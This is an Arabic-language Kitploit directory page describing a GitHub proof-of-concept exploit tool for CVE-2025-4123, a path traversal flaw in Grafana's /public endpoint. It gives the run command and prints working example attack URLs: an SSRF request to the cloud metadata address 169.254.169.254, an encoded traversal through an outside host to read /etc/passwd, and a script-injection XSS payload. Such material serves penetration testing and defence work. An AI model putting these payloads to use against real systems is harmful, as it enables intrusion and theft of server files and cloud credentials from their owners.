Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-4123-Exploit-Tool-Grafana- — CVE-2025-4123 - أداة Grafana | Kitploit
أدوات/GitHubGitHub/ynsmroztas/cve-2025-4123-exploit-tool-grafana-
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubynsmroztas/cve-2025-4123-exploit-tool-grafana-

CVE-2025-4123-Exploit-Tool-Grafana-

CVE-2025-4123 - أداة Grafana

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
326منذ سنة واحدةتمت المراجعة من قبل Kitploit

CVE-2025-4123 - استغلال اجتياز المسار في Grafana

تم تطويره بواسطة mitsec

هذه أداة استغلال لإثبات المفهوم (PoC) لـ CVE-2025-4123، وهي ثغرة حرجة لاجتياز المسار في نقطة النهاية /public في Grafana. يسمح الاستغلال بما يلي:

  • ✅ انتحال الطلبات من جانب الخادم (SSRF)
  • ✅ تضمين الملفات المحلية (LFI)
  • ✅ إعادة توجيه مفتوحة (Open Redirect)
  • ✅ تنفيذ سكربتات عبر المواقع (XSS)

🔥 المتأثر

مثيلات Grafana التي تتعامل نقطة النهاية /public/ فيها بشكل غير صحيح مع المسارات المشفرة مثل:

root@kitploit:~
/public/..%2F%5coast.pro%2F%3f%2F..%2F..

🚀 الاستخدام

root@kitploit:~
python3 cve_2025_4123_exploit_mitsec_final.py

ثم اختر الوضع المطلوب:

  1. SSRF - خدمات داخلية مثل 169.254.169.254
  2. LFI - قراءة ملفات مثل /etc/passwd
  3. Open Redirect - إعادة توجيه إلى نطاقات خارجية
  4. XSS - حقن JavaScript في المسار العام

🧪 مثال

root@kitploit:~
[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL:  http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL:  http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E

📄 إخلاء مسؤولية

تم توفير هذا الرمز لأغراض تعليمية واختبارية مصرح بها فقط. الاستخدام غير المصرح به ضد أنظمة دون موافقة هو غير قانوني.


✍️ المؤلف

  • mitsec
تنزيل الأداة